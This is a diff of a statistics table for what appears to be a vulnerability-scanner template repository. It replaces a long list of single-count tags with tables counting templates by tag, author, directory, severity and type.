| | | | | | | -| openwire | 1 | | | | | | | | | -| pokemonshowdown | 1 | | | | | | | | | -| cyberoamworks | 1 | | | | | | | | | -| ap-pricing-tables-lite | 1 | | | | | | | | | -| ncast | 1 | | | | | | | | | -| cscart | 1 | | | | | | | | | -| clink-office | 1 | | | | | | | | | -| codebuild | 1 | | | | | | | | | -| rpcbind | 1 | | | | | | | | | -| paessler | 1 | | | | | | | | | -| shopex | 1 | | | | | | | | | -| license | 1 | | | | | | | | | -| europeana | 1 | | | | | | | | | -| whois | 1 | | | | | | | | | -| personal-dictionary | 1 | | | | | | | | | -| vampr | 1 | | | | | | | | | -| kkFileview | 1 | | | | | | | | | -| hanwang | 1 | | | | | | | | | -| ogugg | 1 | | | | | | | | | -| openv500 | 1 | | | | | | | | | -| geocaching | 1 | | | | | | | | | -| registrationmagic | 1 | | | | | | | | | -| nirweb-support | 1 | | | | | | | | | -| quttera | 1 | | | | | | | | | -| webmodule-ee | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| smartgateway | 1 | | | | | | | | | -| cf7skins | 1 | | | | | | | | | -| webgrind | 1 | | | | | | | | | -| front | 1 | | | | | | | | | -| benjamin | 1 | | | | | | | | | -| crystal | 1 | | | | | | | | | -| myfitnesspal-community | 1 | | | | | | | | | -| crontab | 1 | | | | | | | | | -| workresources | 1 | | | | | | | | | -| vagrant | 1 | | | | | | | | | -| ocomon_project | 1 | | | | | | | | | -| ansi_up_project | 1 | | | | | | | | | -| flyte | 1 | | | | | | | | | -| nextgen-gallery | 1 | | | | | | | | | -| jobmonster | 1 | | | | | | | | | -| talroo | 1 | | | | | | | | | -| ligeo | 1 | | | | | | | | | -| mypixs_project | 1 | | | | | | | | | -| danieljamesscott | 1 | | | | | | | | | -| stageshow_project | 1 | | | | | | | | | -| zwave | 1 | | | | | | | | | -| kyan | 1 | | | | | | | | | -| sock | 1 | | | | | | | | | -| joinmastodon | 1 | | | | | | | | | -| icearp | 1 | | | | | | | | | -| daybydaycrm | 1 | | | | | | | | | -| nosql | 1 | | | | | | | | | -| localize_my_post_project | 1 | | | | | | | | | -| webclient | 1 | | | | | | | | | -| mercusys | 1 | | | | | | | | | -| wpaffiliatemanager | 1 | | | | | | | | | -| gira | 1 | | | | | | | | | -| symmetricom | 1 | | | | | | | | | -| upward | 1 | | | | | | | | | -| a360inc | 1 | | | | | | | | | -| snapdrop | 1 | | | | | | | | | -| armorgames | 1 | | | | | | | | | -| plurk | 1 | | | | | | | | | -| fleet | 1 | | | | | | | | | -| xiuno | 1 | | | | | | | | | -| alphaplug | 1 | | | | | | | | | -| pretty-url | 1 | | | | | | | | | -| dogtagpki | 1 | | | | | | | | | -| alma | 1 | | | | | | | | | -| scrapingdog | 1 | | | | | | | | | -| jasperserver | 1 | | | | | | | | | -| login-bypass | 1 | | | | | | | | | -| wpquery | 1 | | | | | | | | | -| cryptobox | 1 | | | | | | | | | -| openautomationsoftware | 1 | | | | | | | | | -| buddy | 1 | | | | | | | | | -| meduza-stealer | 1 | | | | | | | | | -| currencyfreaks | 1 | | | | | | | | | -| kindsoft | 1 | | | | | | | | | -| n8n | 1 | | | | | | | | | -| qvidium | 1 | | | | | | | | | -| pagerduty | 1 | | | | | | | | | -| redbubble | 1 | | | | | | | | | -| katz | 1 | | | | | | | | | -| incsub | 1 | | | | | | | | | -| global | 1 | | | | | | | | | -| mediumish | 1 | | | | | | | | | -| collect_and_deliver_interface_for_woocommerce_project | 1 | | | | | | | | | -| librephotos | 1 | | | | | | | | | -| carrdco | 1 | | | | | | | | | -| directus | 1 | | | | | | | | | -| cve2000 | 1 | | | | | | | | | -| tcexam | 1 | | | | | | | | | -| nessus | 1 | | | | | | | | | -| hackerearth | 1 | | | | | | | | | -| xenforo | 1 | | | | | | | | | -| clubhouse | 1 | | | | | | | | | -| authhttp | 1 | | | | | | | | | -| websitepanel | 1 | | | | | | | | | -| audiocode | 1 | | | | | | | | | -| awk | 1 | | | | | | | | | -| sisinformatik | 1 | | | | | | | | | -| atutor | 1 | | | | | | | | | -| chesscom | 1 | | | | | | | | | -| gnuboard5 | 1 | | | | | | | | | -| engage | 1 | | | | | | | | | -| php-proxy | 1 | | | | | | | | | -| bibliopac | 1 | | | | | | | | | -| parsi-font_project | 1 | | | | | | | | | -| eventum_project | 1 | | | | | | | | | -| ffserver | 1 | | | | | | | | | -| tunefind | 1 | | | | | | | | | -| onelogin | 1 | | | | | | | | | -| expressionalsocial-mastodon-instance | 1 | | | | | | | | | -| thorsten_riess | 1 | | | | | | | | | -| wp-cli | 1 | | | | | | | | | -| blipfm | 1 | | | | | | | | | -| dgtl | 1 | | | | | | | | | -| presspage | 1 | | | | | | | | | -| nagvis | 1 | | | | | | | | | -| fabswingers | 1 | | | | | | | | | -| flexnet | 1 | | | | | | | | | -| timeclock | 1 | | | | | | | | | -| teradek | 1 | | | | | | | | | -| jupyterhub | 1 | | | | | | | | | -| m-files | 1 | | | | | | | | | -| championat | 1 | | | | | | | | | -| collibra | 1 | | | | | | | | | -| activeadmin | 1 | | | | | | | | | -| nomad | 1 | | | | | | | | | -| looneytunables | 1 | | | | | | | | | -| social-warfare | 1 | | | | | | | | | -| shadoweb | 1 | | | | | | | | | -| satellian | 1 | | | | | | | | | -| wpsmartcontracts | 1 | | | | | | | | | -| ccleaner | 1 | | | | | | | | | -| mastodon-mastodon | 1 | | | | | | | | | -| wiren | 1 | | | | | | | | | -| gigapan | 1 | | | | | | | | | -| tianqing | 1 | | | | | | | | | -| klogserver | 1 | | | | | | | | | -| wpovernight | 1 | | | | | | | | | -| homer | 1 | | | | | | | | | -| novus | 1 | | | | | | | | | -| ifunny | 1 | | | | | | | | | -| vr-calendar-sync | 1 | | | | | | | | | -| bower | 1 | | | | | | | | | -| acsoft | 1 | | | | | | | | | -| gist | 1 | | | | | | | | | -| cutesoft | 1 | | | | | | | | | -| multi_restaurant_table_reservation_system_project | 1 | | | | | | | | | -| asp.net | 1 | | | | | | | | | -| bws-updater | 1 | | | | | | | | | -| node-red | 1 | | | | | | | | | -| realor | 1 | | | | | | | | | -| csa | 1 | | | | | | | | | -| webtoprint | 1 | | | | | | | | | -| sharingsphere | 1 | | | | | | | | | -| aboutme | 1 | | | | | | | | | -| exposed | 1 | | | | | | | | | -| phpnow | 1 | | | | | | | | | -| forumprawneorg | 1 | | | | | | | | | -| secui | 1 | | | | | | | | | -| incomcms_project | 1 | | | | | | | | | -| broadcom | 1 | | | | | | | | | -| v2924 | 1 | | | | | | | | | -| viddler | 1 | | | | | | | | | -| ras | 1 | | | | | | | | | -| angularjs | 1 | | | | | | | | | -| com_janews | 1 | | | | | | | | | -| red-gate | 1 | | | | | | | | | -| orchardproject | 1 | | | | | | | | | -| my_calendar_project | 1 | | | | | | | | | -| woo-bulk-price-update | 1 | | | | | | | | | -| torify | 1 | | | | | | | | | -| polls-widget | 1 | | | | | | | | | -| containers | 1 | | | | | | | | | -| musiciansocial-mastodon-instance | 1 | | | | | | | | | -| sterling | 1 | | | | | | | | | -| jalios | 1 | | | | | | | | | -| tarantella | 1 | | | | | | | | | -| disabledrocks-mastodon-instance | 1 | | | | | | | | | -| user-management | 1 | | | | | | | | | -| media-library-assistant | 1 | | | | | | | | | -| register | 1 | | | | | | | | | -| pinkbike | 1 | | | | | | | | | -| skeb | 1 | | | | | | | | | -| run-parts | 1 | | | | | | | | | -| sabnzbd | 1 | | | | | | | | | -| rakefile | 1 | | | | | | | | | -| mixi | 1 | | | | | | | | | -| mapproxy | 1 | | | | | | | | | -| citybook | 1 | | | | | | | | | -| interactsoftware | 1 | | | | | | | | | -| smarterstats | 1 | | | | | | | | | -| weglot | 1 | | | | | | | | | -| nih | 1 | | | | | | | | | -| garage_management_system_project | 1 | | | | | | | | | -| prototype | 1 | | | | | | | | | -| buddypress | 1 | | | | | | | | | -| nexusdb | 1 | | | | | | | | | -| opensns | 1 | | | | | | | | | -| mdc_youtube_downloader_project | 1 | | | | | | | | | -| mojoauth | 1 | | | | | | | | | -| fark | 1 | | | | | | | | | -| raspberry | 1 | | | | | | | | | -| wpwax | 1 | | | | | | | | | -| joget | 1 | | | | | | | | | -| calendar | 1 | | | | | | | | | -| jinfornet | 1 | | | | | | | | | -| contact-form-entries | 1 | | | | | | | | | -| xanga | 1 | | | | | | | | | -| supportcandy | 1 | | | | | | | | | -| mesos | 1 | | | | | | | | | -| hrsale | 1 | | | | | | | | | -| nette | 1 | | | | | | | | | -| mojarra | 1 | | | | | | | | | -| hubpages | 1 | | | | | | | | | -| asciinema | 1 | | | | | | | | | -| mystrom | 1 | | | | | | | | | -| yelp | 1 | | | | | | | | | -| simple-image-manipulator_project | 1 | | | | | | | | | -| kindeditor | 1 | | | | | | | | | -| admzip | 1 | | | | | | | | | -| deimos | 1 | | | | | | | | | -| stytch | 1 | | | | | | | | | -| tripadvisor | 1 | | | | | | | | | -| simple-file-list | 1 | | | | | | | | | -| librespeed | 1 | | | | | | | | | -| bagisto | 1 | | | | | | | | | -| smartofficepayroll | 1 | | | | | | | | | -| mastodon-countersocial | 1 | | | | | | | | | -| nerdgraph | 1 | | | | | | | | | -| sukebeinyaasi | 1 | | | | | | | | | -| ismygirl | 1 | | | | | | | | | -| skaut-bazar_project | 1 | | | | | | | | | -| iframe | 1 | | | | | | | | | -| powertek | 1 | | | | | | | | | -| home-assistant | 1 | | | | | | | | | -| cryptocurrencies | 1 | | | | | | | | | -| zatrybipl | 1 | | | | | | | | | -| modeldb | 1 | | | | | | | | | -| emulator | 1 | | | | | | | | | -| accent | 1 | | | | | | | | | -| hongjing | 1 | | | | | | | | | -| advancedcustomfields | 1 | | | | | | | | | -| visual-tools | 1 | | | | | | | | | -| csv | 1 | | | | | | | | | -| zero-spam | 1 | | | | | | | | | -| caldotcom | 1 | | | | | | | | | -| gzforum | 1 | | | | | | | | | -| sh | 1 | | | | | | | | | -| mod-proxy | 1 | | | | | | | | | -| couch | 1 | | | | | | | | | -| xing | 1 | | | | | | | | | -| servmask | 1 | | | | | | | | | -| authorstream | 1 | | | | | | | | | -| ftp-backdoor | 1 | | | | | | | | | -| realtek | 1 | | | | | | | | | -| bonitasoft | 1 | | | | | | | | | -| kubeflow | 1 | | | | | | | | | -| payroll | 1 | | | | | | | | | -| julia | 1 | | | | | | | | | -| visocrea | 1 | | | | | | | | | -| looker | 1 | | | | | | | | | -| tvt | 1 | | | | | | | | | -| wp-ban | 1 | | | | | | | | | -| auru | 1 | | | | | | | | | -| xvideos-models | 1 | | | | | | | | | -| roads | 1 | | | | | | | | | -| supremainc | 1 | | | | | | | | | -| homebridge | 1 | | | | | | | | | -| phacility | 1 | | | | | | | | | -| teradici | 1 | | | | | | | | | -| rantli | 1 | | | | | | | | | -| qualtrics | 1 | | | | | | | | | -| kanev | 1 | | | | | | | | | -| pahtool | 1 | | | | | | | | | -| the-plus-addons-for-elementor | 1 | | | | | | | | | -| go-ibax | 1 | | | | | | | | | -| metacritic | 1 | | | | | | | | | -| qmail | 1 | | | | | | | | | -| grandnode | 1 | | | | | | | | | -| thinkserver | 1 | | | | | | | | | -| cleanweb | 1 | | | | | | | | | -| liberty | 1 | | | | | | | | | -| iparapheur | 1 | | | | | | | | | -| motokiller | 1 | | | | | | | | | -| erigon | 1 | | | | | | | | | -| czepol | 1 | | | | | | | | | -| cars-seller-auto-classifieds-script_project | 1 | | | | | | | | | -| ecom | 1 | | | | | | | | | -| webasyst | 1 | | | | | | | | | -| maga-chat | 1 | | | | | | | | | -| simply-schedule-appointments | 1 | | | | | | | | | -| bws-testimonials | 1 | | | | | | | | | -| microservice | 1 | | | | | | | | | -| teamtreehouse | 1 | | | | | | | | | -| giters | 1 | | | | | | | | | -| iterable | 1 | | | | | | | | | -| gloo | 1 | | | | | | | | | -| browserweb | 1 | | | | | | | | | -| church_admin_project | 1 | | | | | | | | | -| livebos | 1 | | | | | | | | | -| reqlogic | 1 | | | | | | | | | -| everything | 1 | | | | | | | | | -| nytimes | 1 | | | | | | | | | -| visualshortcodes | 1 | | | | | | | | | -| webctrl | 1 | | | | | | | | | -| motioneye | 1 | | | | | | | | | -| edgemax | 1 | | | | | | | | | -| limit | 1 | | | | | | | | | -| cube105 | 1 | | | | | | | | | -| exchangerateapi | 1 | | | | | | | | | -| houzz | 1 | | | | | | | | | -| easy-student-results | 1 | | | | | | | | | -| wsftp | 1 | | | | | | | | | -| istat | 1 | | | | | | | | | -| editor | 1 | | | | | | | | | -| karma_project | 1 | | | | | | | | | -| hydra | 1 | | | | | | | | | -| prvpl | 1 | | | | | | | | | -| nginxwebui | 1 | | | | | | | | | -| shoowbiz | 1 | | | | | | | | | -| skywalking | 1 | | | | | | | | | -| daybyday | 1 | | | | | | | | | -| dfgames | 1 | | | | | | | | | -| smartblog | 1 | | | | | | | | | -| etoilewebdesign | 1 | | | | | | | | | -| crawler | 1 | | | | | | | | | -| interact | 1 | | | | | | | | | -| craft_cms | 1 | | | | | | | | | -| alcatel | 1 | | | | | | | | | -| swim_team_project | 1 | | | | | | | | | -| ticketmaster | 1 | | | | | | | | | -| epm | 1 | | | | | | | | | -| alkacon | 1 | | | | | | | | | -| aspnet | 1 | | | | | | | | | -| omni | 1 | | | | | | | | | -| taringa | 1 | | | | | | | | | -| researchgate | 1 | | | | | | | | | -| graphiql | 1 | | | | | | | | | -| rhymix | 1 | | | | | | | | | -| eyou | 1 | | | | | | | | | -| quixplorer_project | 1 | | | | | | | | | -| sila | 1 | | | | | | | | | -| wl-500 | 1 | | | | | | | | | -| mailmap | 1 | | | | | | | | | -| eBridge | 1 | | | | | | | | | -| baseapp | 1 | | | | | | | | | -| skyscanner | 1 | | | | | | | | | -| issuu | 1 | | | | | | | | | -| i-plugins | 1 | | | | | | | | | -| petfinder | 1 | | | | | | | | | -| friendweb | 1 | | | | | | | | | -| foogallery | 1 | | | | | | | | | -| bigo-live | 1 | | | | | | | | | -| ulanzi | 1 | | | | | | | | | -| employee_records_system_project | 1 | | | | | | | | | -| gab | 1 | | | | | | | | | -| kotburger | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| koha | 1 | | | | | | | | | -| com-property | 1 | | | | | | | | | -| twig | 1 | | | | | | | | | -| jcms | 1 | | | | | | | | | -| osint-p2p | 1 | | | | | | | | | -| piratebay | 1 | | | | | | | | | -| oas | 1 | | | | | | | | | -| simple_task_managing_system_project | 1 | | | | | | | | | -| postcrossing | 1 | | | | | | | | | -| shardingsphere | 1 | | | | | | | | | -| web-suite | 1 | | | | | | | | | -| evernote | 1 | | | | | | | | | -| mix | 1 | | | | | | | | | -| fish | 1 | | | | | | | | | -| foursquare | 1 | | | | | | | | | -| jedox | 1 | | | | | | | | | -| liftoffsoftware | 1 | | | | | | | | | -| batflat | 1 | | | | | | | | | -| catchplugins | 1 | | | | | | | | | -| cron | 1 | | | | | | | | | -| reflected | 1 | | | | | | | | | -| chefio | 1 | | | | | | | | | -| smashballoon | 1 | | | | | | | | | -| alquistai | 1 | | | | | | | | | -| easyvista | 1 | | | | | | | | | -| tmdb | 1 | | | | | | | | | -| pivotaltracker | 1 | | | | | | | | | -| distcc | 1 | | | | | | | | | -| bimi | 1 | | | | | | | | | -| cowrie | 1 | | | | | | | | | -| nutanix | 1 | | | | | | | | | -| patriots-win | 1 | | | | | | | | | -| wechat_brodcast_project | 1 | | | | | | | | | -| codemiq | 1 | | | | | | | | | -| ricoh | 1 | | | | | | | | | -| ccm | 1 | | | | | | | | | -| quiz | 1 | | | | | | | | | -| wpsolr | 1 | | | | | | | | | -| jorani_project | 1 | | | | | | | | | -| yourls | 1 | | | | | | | | | -| i-mscp | 1 | | | | | | | | | -| syfadis | 1 | | | | | | | | | -| cyberchef | 1 | | | | | | | | | -| vibilagare | 1 | | | | | | | | | -| ptr | 1 | | | | | | | | | -| payeezy | 1 | | | | | | | | | -| learning-management-system | 1 | | | | | | | | | -| krweb | 1 | | | | | | | | | -| aquasec | 1 | | | | | | | | | -| cd-action | 1 | | | | | | | | | -| thinvnc | 1 | | | | | | | | | -| dragonfly_project | 1 | | | | | | | | | -| blind-ssrf | 1 | | | | | | | | | -| softlimit | 1 | | | | | | | | | -| security | 1 | | | | | | | | | -| updraftplus | 1 | | | | | | | | | -| vertex | 1 | | | | | | | | | -| malshare | 1 | | | | | | | | | -| joomlashowroom | 1 | | | | | | | | | -| vultr | 1 | | | | | | | | | -| openethereum | 1 | | | | | | | | | -| zoomsounds | 1 | | | | | | | | | -| wp-video-gallery-free | 1 | | | | | | | | | -| officeserver | 1 | | | | | | | | | -| femtocell | 1 | | | | | | | | | -| icloud | 1 | | | | | | | | | -| emobile | 1 | | | | | | | | | -| helpdesk_pro_project | 1 | | | | | | | | | -| kanich | 1 | | | | | | | | | -| documentor_project | 1 | | | | | | | | | -| ssh-agent | 1 | | | | | | | | | -| easyen | 1 | | | | | | | | | -| xvideos-profiles | 1 | | | | | | | | | -| macaddresslookup | 1 | | | | | | | | | -| qibocms | 1 | | | | | | | | | -| age-gate | 1 | | | | | | | | | -| carbonmade | 1 | | | | | | | | | -| o2oa | 1 | | | | | | | | | -| viminfo | 1 | | | | | | | | | -| phpgedview | 1 | | | | | | | | | -| zbiornik | 1 | | | | | | | | | -| ics | 1 | | | | | | | | | -| nordpass | 1 | | | | | | | | | -| nodered | 1 | | | | | | | | | -| nsicg | 1 | | | | | | | | | -| urlscan | 1 | | | | | | | | | -| magnussolution | 1 | | | | | | | | | -| wpb-show-core | 1 | | | | | | | | | -| defender-security | 1 | | | | | | | | | -| teamforge | 1 | | | | | | | | | -| magnusbilling | 1 | | | | | | | | | -| wordpress-country-selector | 1 | | | | | | | | | -| jbzd | 1 | | | | | | | | | -| producthunt | 1 | | | | | | | | | -| webp_converter_for_media_project | 1 | | | | | | | | | -| documentor-lite | 1 | | | | | | | | | -| kivicare-clinic-management-system | 1 | | | | | | | | | -| easyreport | 1 | | | | | | | | | -| ciphertrust | 1 | | | | | | | | | -| vnc | 1 | | | | | | | | | -| systeminformation | 1 | | | | | | | | | -| cudatel | 1 | | | | | | | | | -| binom | 1 | | | | | | | | | -| myblog | 1 | | | | | | | | | -| bws-xss | 1 | | | | | | | | | -| musicstore | 1 | | | | | | | | | -| microfinance | 1 | | | | | | | | | -| aflam | 1 | | | | | | | | | -| openhab | 1 | | | | | | | | | -| brighthr | 1 | | | | | | | | | -| htmlcoderhelper | 1 | | | | | | | | | -| winscp | 1 | | | | | | | | | -| openmage | 1 | | | | | | | | | -| bws-custom-search | 1 | | | | | | | | | -| ligeo-archives | 1 | | | | | | | | | -| helmet_store_showroom_site_project | 1 | | | | | | | | | -| properties | 1 | | | | | | | | | -| deployment | 1 | | | | | | | | | -| cups | 1 | | | | | | | | | -| yiboo | 1 | | | | | | | | | -| biotime | 1 | | | | | | | | | -| oahms | 1 | | | | | | | | | -| phonepe-payment-solutions | 1 | | | | | | | | | -| caldera | 1 | | | | | | | | | -| goodjob | 1 | | | | | | | | | -| pillowfort | 1 | | | | | | | | | -| ait-csv | 1 | | | | | | | | | -| super-socializer | 1 | | | | | | | | | -| lms | 1 | | | | | | | | | -| gogits | 1 | | | | | | | | | -| minds | 1 | | | | | | | | | -| ids | 1 | | | | | | | | | -| xinuos | 1 | | | | | | | | | -| bestbuy | 1 | | | | | | | | | -| vk | 1 | | | | | | | | | -| php_curl_class_project | 1 | | | | | | | | | -| olt | 1 | | | | | | | | | -| Microsoft | 1 | | | | | | | | | -| helpdesk | 1 | | | | | | | | | -| vmstio-mastodon-instance | 1 | | | | | | | | | -| zkoss | 1 | | | | | | | | | -| ultimate-weather_project | 1 | | | | | | | | | -| node-srv_project | 1 | | | | | | | | | -| b-elektro | 1 | | | | | | | | | -| easycorp | 1 | | | | | | | | | -| meilisearch | 1 | | | | | | | | | -| viewlinc | 1 | | | | | | | | | -| qwiz-online-quizzes-and-flashcards | 1 | | | | | | | | | -| orcusrat | 1 | | | | | | | | | -| interlib | 1 | | | | | | | | | -| seeyon-oa | 1 | | | | | | | | | -| taiwanese | 1 | | | | | | | | | -| shopxo | 1 | | | | | | | | | -| taskrabbit | 1 | | | | | | | | | -| ldap-wp-login-integration-with-active-directory | 1 | | | | | | | | | -| flowci | 1 | | | | | | | | | -| phabricator | 1 | | | | | | | | | -| pdf-generator-for-wp | 1 | | | | | | | | | -| bookcrossing | 1 | | | | | | | | | -| discusssocial-mastodon-instance | 1 | | | | | | | | | -| pixelfedsocial | 1 | | | | | | | | | -| goodoldweb | 1 | | | | | | | | | -| codetipi | 1 | | | | | | | | | -| embed_swagger_project | 1 | | | | | | | | | -| nootheme | 1 | | | | | | | | | -| orcus | 1 | | | | | | | | | -| jgraph | 1 | | | | | | | | | -| dockerhub | 1 | | | | | | | | | -| couchsurfing | 1 | | | | | | | | | -| nweb2fax | 1 | | | | | | | | | -| codesnippets | 1 | | | | | | | | | -| tjws | 1 | | | | | | | | | -| eleanor | 1 | | | | | | | | | -| wprssaggregator | 1 | | | | | | | | | -| coderwall | 1 | | | | | | | | | -| orbys | 1 | | | | | | | | | -| microsoft-technet-community | 1 | | | | | | | | | -| truth-social | 1 | | | | | | | | | -| wishlistr | 1 | | | | | | | | | -| sungrow | 1 | | | | | | | | | -| hiawatha | 1 | | | | | | | | | -| warriorforum | 1 | | | | | | | | | -| eventtickets | 1 | | | | | | | | | -| fusion | 1 | | | | | | | | | -| moonpay | 1 | | | | | | | | | -| message-me | 1 | | | | | | | | | -| tellonym | 1 | | | | | | | | | -| microcomputers | 1 | | | | | | | | | -| sensu | 1 | | | | | | | | | -| karma | 1 | | | | | | | | | -| stackhawk | 1 | | | | | | | | | -| linktap | 1 | | | | | | | | | -| lorsh-mastodon-instance | 1 | | | | | | | | | -| encompass | 1 | | | | | | | | | -| dapp | 1 | | | | | | | | | -| pluginops | 1 | | | | | | | | | -| 'updraftplus' | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| somansa | 1 | | | | | | | | | -| elasticpot | 1 | | | | | | | | | -| isams | 1 | | | | | | | | | -| greenbone | 1 | | | | | | | | | -| parse | 1 | | | | | | | | | -| pelco | 1 | | | | | | | | | -| lua | 1 | | | | | | | | | -| web-dorado | 1 | | | | | | | | | -| mediation | 1 | | | | | | | | | -| n-central | 1 | | | | | | | | | -| enrollment_system_project | 1 | | | | | | | | | -| clustering | 1 | | | | | | | | | -| affiliates-manager | 1 | | | | | | | | | -| planetestream | 1 | | | | | | | | | -| gpc | 1 | | | | | | | | | -| dynamic | 1 | | | | | | | | | -| pivotal_software | 1 | | | | | | | | | -| redux | 1 | | | | | | | | | -| pauple | 1 | | | | | | | | | -| vfs | 1 | | | | | | | | | -| vistaweb | 1 | | | | | | | | | -| markdown | 1 | | | | | | | | | -| paysyspro | 1 | | | | | | | | | -| h2c | 1 | | | | | | | | | -| accessally | 1 | | | | | | | | | -| senayan | 1 | | | | | | | | | -| topacm | 1 | | | | | | | | | -| bouqueteditor_project | 1 | | | | | | | | | -| modx | 1 | | | | | | | | | -| querysol | 1 | | | | | | | | | -| ilch | 1 | | | | | | | | | -| paramountplus | 1 | | | | | | | | | -| roundcube | 1 | | | | | | | | | -| behat | 1 | | | | | | | | | -| vcloud | 1 | | | | | | | | | -| pornhub-porn-stars | 1 | | | | | | | | | -| helprace | 1 | | | | | | | | | -| knowage | 1 | | | | | | | | | +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|--------------------------------------------------------|-------|---------------------------------------|-------|----------------------|-------|----------|-------|------|-------| +| cve | 2511 | dhiyaneshdk | 1322 | http | 7547 | info | 3697 | file | 337 | +| panel | 1157 | daffainfo | 865 | file | 337 | high | 1770 | dns | 25 | +| wordpress | 983 | dwisiswant0 | 803 | workflows | 191 | medium | 1528 | | | +| exposure | 948 | pussycat0x | 362 | network | 134 | critical | 1044 | | | +| xss | 911 | ritikchaddha | 354 | cloud | 99 | low | 265 | | | +| wp-plugin | 852 | pikpikcu | 353 | code | 81 | unknown | 39 | | | +| osint | 804 | pdteam | 297 | javascript | 60 | | | | | +| tech | 686 | princechaddha | 269 | ssl | 29 | | | | | +| lfi | 662 | ricardomaia | 232 | dns | 22 | | | | | +| misconfig | 659 | geeknik | 231 | dast | 21 | | | | | +| rce | 600 | theamanrawat | 223 | headless | 12 | | | | | +| edb | 599 | r3y3r53 | 200 | passive | 1 | | | | | +| packetstorm | 544 | 0x_akoko | 179 | TEMPLATES-STATS.json | 1 | | | | | +| wpscan | 502 | gy741 | 158 | cves.json | 1 | | | | | +| cve2021 | 491 | righettod | 149 | contributors.json | 1 | | | | | +| cve2022 | 479 | rxerium | 142 | | | | | | | +| wp | 426 | sleepingbag945 | 132 | | | | | | | +| cve2023 | 380 | arafatansari | 118 | | | | | | | +| unauth | 367 | tess | 109 | | | | | | | +| sqli | 364 | pdresearch | 84 | | | | | | | +| file | 346 | iamnoooob | 69 | | | | | | | +| authenticated | 343 | idealphase | 66 | | | | | | | +| intrusive | 302 | madrobot | 65 | | | | | | | +| detect | 295 | zzeitlin | 64 | | | | | | | +| login | 284 | rootxharsh | 62 | | | | | | | +| kev | 275 | akincibor | 59 | | | | | | | +| cve2020 | 257 | for3stco1d | 55 | | | | | | | +| token-spray | 243 | philippedelteil | 53 | | | | | | | +| oast | 222 | johnk3r | 42 | | | | | | | +| config | 221 | edoardottt | 42 | | | | | | | +| default-login | 216 | gaurang | 42 | | | | | | | +| top-200 | 215 | c-sh0 | 35 | | | | | | | +| osint-social | 210 | j4vaovo | 35 | | | | | | | +| network | 195 | adam crosser | 31 | | | | | | | +| token | 193 | luisfelipe146 | 31 | | | | | | | +| apache | 191 | ice3man | 29 | | | | | | | +| | 191 | mastercho | 29 | | | | | | | +| devops | 177 | pwnhxl | 28 | | | | | | | +| cve2018 | 170 | hardik-solanki | 24 | | | | | | | +| iot | 167 | organiccrap | 24 | | | | | | | +| cve2019 | 164 | techbrunchfr | 23 | | | | | | | +| keys | 156 | harsh | 23 | | | | | | | +| joomla | 148 | ctflearner | 23 | | | | | | | +| install | 147 | ffffffff0x | 22 | | | | | | | +| malware | 142 | userdehghani | 22 | | | | | | | +| tcp | 136 | parthmalhotra | 20 | | | | | | | +| redirect | 135 | kazgangap | 19 | | | | | | | +| cloud | 134 | cckuailong | 18 | | | | | | | +| aws | 134 | sullo | 18 | | | | | | | +| auth-bypass | 133 | lu4nx | 17 | | | | | | | +| ssrf | 119 | bhutch | 17 | | | | | | | +| phishing | 117 | 0xpugazh | 16 | | | | | | | +| amazon | 117 | random-robbie | 16 | | | | | | | +| cms | 113 | shaikhyaser | 16 | | | | | | | +| files | 113 | sheikhrishad | 15 | | | | | | | +| cve2010 | 112 | pr3r00t | 15 | | | | | | | +| cve2017 | 110 | unapibageek | 15 | | | | | | | +| router | 108 | dogasantos | 14 | | | | | | | +| top-100 | 100 | milo2012 | 14 | | | | | | | +| aws-cloud-config | 90 | r3dg33k | 14 | | | | | | | +| disclosure | 89 | tenbird | 14 | | | | | | | +| linux | 85 | sharath | 13 | | | | | | | +| cve2024 | 81 | melbadry9 | 13 | | | | | | | +| code | 81 | 0ri2n | 13 | | | | | | | +| local | 80 | nullfuzz | 13 | | | | | | | +| seclists | 79 | theabhinavgaur | 13 | | | | | | | +| takeover | 79 | elsfa7110 | 13 | | | | | | | +| privesc | 79 | meme-lord | 12 | | | | | | | +| tokens | 78 | suman_kar | 12 | | | | | | | +| fileupload | 76 | kazet | 12 | | | | | | | +| oracle | 73 | cyllective | 11 | | | | | | | +| oss | 68 | wdahlenb | 11 | | | | | | | +| js | 67 | logicalhunter | 10 | | | | | | | +| cisco | 67 | co5mos | 10 | | | | | | | +| enum | 65 | random_robbie | 10 | | | | | | | +| adobe | 63 | nadino | 10 | | | | | | | +| ir | 61 | 0x240x23elu | 10 | | | | | | | +| huntr | 60 | alph4byt3 | 10 | | | | | | | +| cve2015 | 59 | hackergautam | 10 | | | | | | | +| atlassian | 59 | fabaff | 9 | | | | | | | +| cve2016 | 57 | olearycrew | 9 | | | | | | | +| vmware | 56 | momika233 | 9 | | | | | | | +| google | 56 | oppsec | 9 | | | | | | | +| detection | 56 | adamcrosser | 9 | | | | | | | +| c2 | 55 | emadshanab | 9 | | | | | | | +| logs | 48 | initstring | 9 | | | | | | | +| tenable | 48 | aashiq | 8 | | | | | | | +| log4j | 47 | that_juan_ | 8 | | | | | | | +| hackerone | 46 | noraj | 8 | | | | | | | +| vulhub | 46 | irshad ahamed | 8 | | | | | | | +| osint-gaming | 45 | _0xf4n9x_ | 8 | | | | | | | +| aem | 45 | iamthefrogy | 8 | | | | | | | +| php | 45 | veshraj | 8 | | | | | | | +| jndi | 44 | zh | 8 | | | | | | | +| debug | 44 | divya_mudgal | 7 | | | | | | | +| cve2014 | 44 | harshbothra_ | 7 | | | | | | | +| generic | 43 | huta0 | 7 | | | | | | | +| deserialization | 43 | amit-jd | 7 | | | | | | | +| traversal | 42 | nodauf | 7 | | | | | | | +| osint-porn | 42 | dr_set | 7 | | | | | | | +| oa | 42 | tarunkoyalwar | 7 | | | | | | | +| osint-hobby | 42 | randomstr1ng | 7 | | | | | | | +| microsoft | 42 | caspergn | 7 | | | | | | | +| plugin | 42 | me_dheeraj | 7 | | | | | | | +| | | (https://twitter.com/dheerajmadhukar) | | | | | | | | +| springboot | 41 | leovalcante | 7 | | | | | | | +| cnvd | 41 | kophjager007 | 7 | | | | | | | +| misc | 40 | techryptic (@tech) | 7 | | | | | | | +| miscellaneous | 38 | its0x08 | 7 | | | | | | | +| injection | 38 | forgedhallpass | 6 | | | | | | | +| jira | 37 | gitlab red team | 6 | | | | | | | +| listing | 37 | megamansec | 6 | | | | | | | +| kubernetes | 37 | devang-solanki | 6 | 